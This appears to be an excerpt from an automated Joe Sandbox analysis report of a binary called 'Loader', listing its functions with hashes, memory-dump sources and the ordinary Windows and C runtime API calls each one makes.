Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: edb0d0f85dabc39ee739ce68ded85e6201c4604284bd183c108bd83c66e8abe2
Instruction ID: a53a4fdc2eb9f04a4a291b4145779f39fc3c090348abb760f0e9d66cc4643fc2
Opcode Fuzzy Hash: edb0d0f85dabc39ee739ce68ded85e6201c4604284bd183c108bd83c66e8abe2
Instruction Fuzzy Hash: 68F0273930024857CB14AB35D94576A7B90EBC1714F0A405AFA059B680C2719843CB90

Function 00ECBA4C Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00EC62F0,?,20001004,00000000,00000002,?,?,00EC5202), ref: 00ECBA80

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 1567f1eccfd4ef886b33887827b1ba2b33f900c8b29ee218957e102e620975a3
Instruction ID: b55880f99469faa4c9a43a87d4afaae8fd1b66aa64376b792c28094d65c3b4b5
Opcode Fuzzy Hash: 1567f1eccfd4ef886b33887827b1ba2b33f900c8b29ee218957e102e620975a3
Instruction Fuzzy Hash: 49E01A3190426DBBCB126F62DD06FAE3B65EB44B61F015019F916791609B328D22AA94

Function 00EBE420 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000E541), ref: 00EBE425

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 032dd30d915314bbc510a533bcbbb01dfb93b525cfdb1ffda1e480d124f867f1
Instruction ID: 8c6ac31a529944a70bbd1b203d0f06497658aa0d8d8c5bc7e665cb09277f6a6c
Opcode Fuzzy Hash: 032dd30d915314bbc510a533bcbbb01dfb93b525cfdb1ffda1e480d124f867f1
Instruction Fuzzy Hash:

Function 00ECC705 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00ECC705

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 0a18e2cbe7ba1df6d9c66f60b26b4942c34f94b353a08fc3ceea274eb989f680
Instruction ID: 41c338b3f8cfbc949239c75dbbb14c748f7f56681c45285f5211a3fb522d81d5
Opcode Fuzzy Hash: 0a18e2cbe7ba1df6d9c66f60b26b4942c34f94b353a08fc3ceea274eb989f680
Instruction Fuzzy Hash: E8A011B02002888F83008F33AB882083BE8AB00AE8308882AB00CE80A0FA2080088F00

Function 00EB1000 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575a65f46a6968a851d95f4fbb3b08d64d78846f706d08c464dbb8cdd4e640a5
Instruction ID: 053cc40399908cd3af7f57e7194241caf5ba3193e0b9b54fda9fb29f1cd93430
Opcode Fuzzy Hash: 575a65f46a6968a851d95f4fbb3b08d64d78846f706d08c464dbb8cdd4e640a5
Instruction Fuzzy Hash: 4B517AB0D1120D9FCB40DFA8D5A19EEBBF4AB09360F6454AAE815FB310D734AA41CB65

Function 00EB1690 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b09bf12e5c2e8d7582d564a84ecff0233d655a9ca007892ea5b4b72774f514
Instruction ID: e1c8a8a4c9ccfe527baa462823e2862883390426e6429de92dd0015c17f0e831
Opcode Fuzzy Hash: e5b09bf12e5c2e8d7582d564a84ecff0233d655a9ca007892ea5b4b72774f514
Instruction Fuzzy Hash: 6AD06C3A645A58AFC210CF4AE840D41F7A8FB8D670B158066EA58A7B20C231F815CFE0

Function 00EDA1B2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00734FB8,00734FB8,00000000,7FFFFFFF,?,00EDA19D,00734FB8,00734FB8,00000000,00734FB8,?,?,?,?,00734FB8,00000000), ref: 00EDA258
__alloca_probe_16.LIBCMT ref: 00EDA313
__alloca_probe_16.LIBCMT ref: 00EDA3A2
__freea.LIBCMT ref: 00EDA3ED
__freea.LIBCMT ref: 00EDA3F3
__freea.LIBCMT ref: 00EDA429
__freea.LIBCMT ref: 00EDA42F
__freea.LIBCMT ref: 00EDA43F

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: d80035976388243f9adecc96ce9ad0dcc02af696c496e62b06d6d8ea83d2b25d
Instruction ID: c3a09560e5dd205b0bb28ccba162ac92b88e60e6f3c27bd95b2709011bd9b2ce
Opcode Fuzzy Hash: d80035976388243f9adecc96ce9ad0dcc02af696c496e62b06d6d8ea83d2b25d
Instruction Fuzzy Hash: 837125729002495BDF219F548C81BEF77EAEF49318F1C243AE814B7391E7769E028752

Function 00ECDC7B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00ECDD01

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
Instruction ID: dfe99e928fffa7ce087e72066855be0913542b5df3b53f7f1dcc7a54e565ff07
Opcode Fuzzy Hash: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
Instruction Fuzzy Hash: 84B14472E083959FDB118F28CD81FEEBBA5EB55310F14516EE845BF282D2739902C7A0

Function 00EBF7F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00EBF827
___except_validate_context_record.LIBVCRUNTIME ref: 00EBF82F
_ValidateLocalCookies.LIBCMT ref: 00EBF8B8
__IsNonwritableInCurrentImage.LIBCMT ref: 00EBF8E3
_ValidateLocalCookies.LIBCMT ref: 00EBF938

Strings

csm, xrefs: 00EBF8CD

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 505a1e4b7d335f3154b5a5b228ef19f1793563a5c408d61a146dcc7cbdc3b3ee
Instruction ID: e7874163bac0d25dec843023d3e434a225053bf553999dfc1383cdef4f826a85
Opcode Fuzzy Hash: 505a1e4b7d335f3154b5a5b228ef19f1793563a5c408d61a146dcc7cbdc3b3ee
Instruction Fuzzy Hash: B841A530E00219ABCF14DF69CC85ADFBBE5AF45318F149166E815BB352D7319E06CB91

Function 00EBEB1C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EBEB22
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00EBEB30
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00EBEB41

Strings

kernel32.dll, xrefs: 00EBEB1D
GetSystemTimePreciseAsFileTime, xrefs: 00EBEB2A
GetTempPath2W, xrefs: 00EBEB36

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
Instruction ID: 02b8541b52e14a4af18aed91a861a8fe2e05a4671fe6c1a5b6d001abfb3adff9
Opcode Fuzzy Hash: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
Instruction Fuzzy Hash: CDD05E759893E86F83109B73BC4E8963E94AB0426130104A9F409F61A0F3B008448B94

Function 00ED8A9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ff4c713123762b4e5f75e045e79e0129d9b3e216b69515aeeb6a3282321803
Instruction ID: fd396dc3e4292bec62739b69be470da07e33dc1a9d4aac697cae5adc33dc4fa8
Opcode Fuzzy Hash: 69ff4c713123762b4e5f75e045e79e0129d9b3e216b69515aeeb6a3282321803
Instruction Fuzzy Hash: 4AB1DF70A04249AFDB11DF98DA81BAEBBB5FF55314F14219AE404BB3D2CB719D42CB60

Function 00EC9AF4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B02
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EC9B10
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EC9B29
SetLastError.KERNEL32(00000000,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B7B

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3f9cfb0f97c5588a732af0e97230ee10e46b8c3ae06a4a81436299a4d978c59b
Instruction ID: a643fd99d7d2b49e22ed043d91c10318c9c183ccf53924271e1ab802ce909cbf
Opcode Fuzzy Hash: 3f9cfb0f97c5588a732af0e97230ee10e46b8c3ae06a4a81436299a4d978c59b
Instruction Fuzzy Hash: 6B016833118A157EA6242675BDCDF1B2AA4EB117B8720133EF115793F2EE134C0B8148

Function 00ECA3BC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00ECA4DB
CallUnexpected.LIBVCRUNTIME ref: 00ECA754

Strings

csm, xrefs: 00ECA3F9
csm, xrefs: 00ECA512
csm, xrefs: 00ECA466

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 5e957b10efabc63d806f3d300a3b5aaaf08460ea14323dce10ae4ef2a9e63f5b
Instruction ID: 1e976d904edde13338274e1108761c22d7285bb28f340d53cd405d065c560b75
Opcode Fuzzy Hash: 5e957b10efabc63d806f3d300a3b5aaaf08460ea14323dce10ae4ef2a9e63f5b
Instruction Fuzzy Hash: D3B17C71800209DFCF18DFA4CA45EAEB7B5BF14308F18656EE8117B212D772D952CB92

Function 00EC4A89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C4C39003,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00000002,?,00EC4BE6,00EC7849), ref: 00EC4ABE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EC4AD0
FreeLibrary.KERNEL32(00000000,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00000002,?,00EC4BE6,00EC7849), ref: 00EC4AF2

Strings

CorExitProcess, xrefs: 00EC4AC8
mscoree.dll, xrefs: 00EC4AB7

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
Instruction ID: fb23a1b7123063497a4275b4f809554402059c0f3821f1cb24ae9015ed5cedc3
Opcode Fuzzy Hash: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
Instruction Fuzzy Hash: 5001F775944759EFCB118F81CC44FAE7BF8FB04B15F010229F821B66D0EB749904CA84

Function 00ECC516 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00ECC59B
__alloca_probe_16.LIBCMT ref: 00ECC664
__freea.LIBCMT ref: 00ECC6CB

Part of subcall function 00ECAD61: RtlAllocateHeap.NTDLL(00000000,00ECCD3A,?,?,00ECCD3A,00000220,?,00000000,?), ref: 00ECAD93

__freea.LIBCMT ref: 00ECC6DE
__freea.LIBCMT ref: 00ECC6EB

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 23bff41472105d510e91f78c53ebae4b2da160527cdda79511d560ec11c389aa
Instruction ID: 58374e164c93de57a2ce3a2ae43384e3de61594ccfd646972c88838af7bf094d
Opcode Fuzzy Hash: 23bff41472105d510e91f78c53ebae4b2da160527cdda79511d560ec11c389aa
Instruction Fuzzy Hash: FA51A3725002066FEB219F64CE81FFB7AA9EF44B18B25252DFD09F6241E772DC528660

Function 00EBE8E7 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00EBE8FB
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE91A
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE948
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9A3
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9BA

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 7e146295e943160a57245f9083c17058540e99987ce2c24c8eea3c0ef0f22c59
Instruction ID: 6d2462ac76463f36a52cf0af08e895471ab0ed49af2f45fef8bd554bab05c032
Opcode Fuzzy Hash: 7e146295e943160a57245f9083c17058540e99987ce2c24c8eea3c0ef0f22c59
Instruction Fuzzy Hash: 4F414971900606DFCB64DF65C485AEBB3F8FF84354B105AAAE456B7780E730E988CB51

Function 00EBC054 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00EBC05B
std::_Lockit::_Lockit.LIBCPMT ref: 00EBC066
std::_Lockit::~_Lockit.LIBCPMT ref: 00EBC0D4

Part of subcall function 00EBBF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EBBF75

std::locale::_Setgloballocale.LIBCPMT ref: 00EBC081
_Yarn.LIBCPMT ref: 00EBC097

Memory Dump Source

Source File: 00000000.00000002.2157550482.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.2157529734.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157625418.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157640917.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157653275.0000000000EE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157665892.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157680997.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_Loader.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
Instruction ID: 9fad3bdbc61f59105ef7e97142ffbc6e59297cc44b6c37ebe1763dbf341ecaca
Opcode Fuzzy Hash: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
Instruction Fuzzy Hash: DF019A75A046598BC706EB208886ABE7BA1FB85710B152009F8167B391CF74AE46CBC1

Function 00ECF766 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(?,?,00EC495A,00EE56B0,0000000C), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000), ref: 00ECB059

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 00ECF825
